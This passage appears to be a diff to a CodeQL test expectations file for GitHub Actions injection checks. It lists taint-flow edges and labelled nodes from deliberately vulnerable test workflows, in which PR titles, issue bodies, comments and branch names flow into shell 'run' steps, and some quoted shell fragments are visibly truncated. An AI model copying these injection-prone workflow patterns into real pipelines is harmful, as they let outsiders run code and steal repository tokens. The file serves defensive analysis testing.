title [title] | provenance | | +| .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | provenance | | +| .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | provenance | | +| .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | provenance | | +| .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | provenance | | +| .github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | 
.github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api 
/repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | provenance | | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | provenance | | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | provenance | | +| .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | provenance | | +| .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | provenance | | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | provenance | | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | provenance | | +| .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | provenance | | +| .github/workflows/test27.yml:19:7:21:4 | Job outputs node [chart-version] | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | provenance | | +| .github/workflows/test27.yml:20:23:20:68 | steps.get-version.outputs.chart_version | .github/workflows/test27.yml:19:7:21:4 | Job outputs node [chart-version] | provenance | | +| .github/workflows/test27.yml:35:9:41:6 | Uses Step | 
.github/workflows/test27.yml:43:14:44:66 | echo "chart_version=$(> $GITHUB_OUTPUT\n | semmle.label | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | +| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | semmle.label | steps.prepare.outputs.pr | +| .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning4.yml:17:9:21:6 | Run Step: artifact [id] | semmle.label | Run Step: artifact [id] | +| .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | 
+| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | semmle.label | github.event.pages[1].title | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | semmle.label | github.event.pages[11].title | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | semmle.label | github.event.pages[0].page_name | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | semmle.label | github.event.pages[2222].page_name | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | semmle.label | Run Step: extract-url [initial_url] | +| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | 
semmle.label | Run Step: curl [redirected_url] | +| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | semmle.label | steps.extract-url.outputs.initial_url | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | +| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | semmle.label | steps.curl.outputs.redirected_url | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | semmle.label | steps.trim-url.outputs.trimmed_url | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| 
.github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | semmle.label | github.event.issue.title | +| 
.github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | semmle.label | env.global_env | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | semmle.label | env.job_env | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | semmle.label | env.step_env | +| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | semmle.label | toJSON(github.event.issue.title) | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | 
github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | semmle.label | github.event.review.body | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_target.yml:10:19:10:55 | 
github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | semmle.label | github.head_ref | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | semmle.label | github.event.commits[11].message | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | semmle.label | github.event.commits[11].author.email | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | semmle.label | github.event.commits[11].author.name | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | semmle.label | github.event.head_commit.author.email | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | semmle.label | github.event.head_commit.author.name | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | semmle.label | github.event.head_commit.committer.email | +| 
.github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | +| .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | +| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | +| .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | +| .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| 
.github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | +| .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | semmle.label | github.event['comment']['body'] | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | semmle.label | needs.test1.outputs.job_output | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | semmle.label | steps.summary.outputs.value | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | semmle.label | 
github.event.workflow_run.head_branch | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | semmle.label | Uses Step: command | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | semmle.label | steps.command.outputs.command-arguments | +| .github/workflows/test1.yml:15:5:27:39 | Job: updateJira [ISSUE_KEY] | semmle.label | Job: updateJira [ISSUE_KEY] | +| .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | +| .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | semmle.label | Uses Step: changed | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | semmle.label | steps.changed.outputs.locale_files | +| .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | semmle.label | Uses Step: changed2 | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | semmle.label | steps.changed2.outputs.locale_files | +| .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | semmle.label | Job outputs node [payload] | +| .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | 
toJSON(github.event.issue) | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | semmle.label | toJSON(github.event.comment.body).foo | +| .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | semmle.label | Uses Step: comment-branch | +| .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | semmle.label | Uses Step: refs | +| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | semmle.label | steps.comment-branch.outputs.head_ref | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | semmle.label | steps.refs.outputs.head_ref | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | semmle.label | Job outputs node [payload] | +| .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | semmle.label | fromJson(needs.parse-issue.outputs.payload) | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | 
fromJson(needs.parse-issue.outputs.payload).version | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | +| .github/workflows/test9.yml:35:42:35:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/test9.yml:43:42:43:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | +| .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | semmle.label | Job outputs node [pr_num] | +| .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | semmle.label | steps.set-ref.outputs.pr_num | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | semmle.label | Run Step: set-ref [pr_num] | +| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' 
artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | +| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | semmle.label | github.event.pull_request.title \|\| "foo" | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | semmle.label | github.event.changes.body.from | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | semmle.label | github.event.changes.head.ref.from | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | semmle.label | toJson(github.event.changes) | +| .github/workflows/test14.yml:13:9:16:6 | Run Step: changed-files [files] | semmle.label | Run Step: changed-files [files] | +| .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | semmle.label | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | semmle.label | steps.changed-files.outputs.files | +| .github/workflows/test14.yml:23:9:27:6 
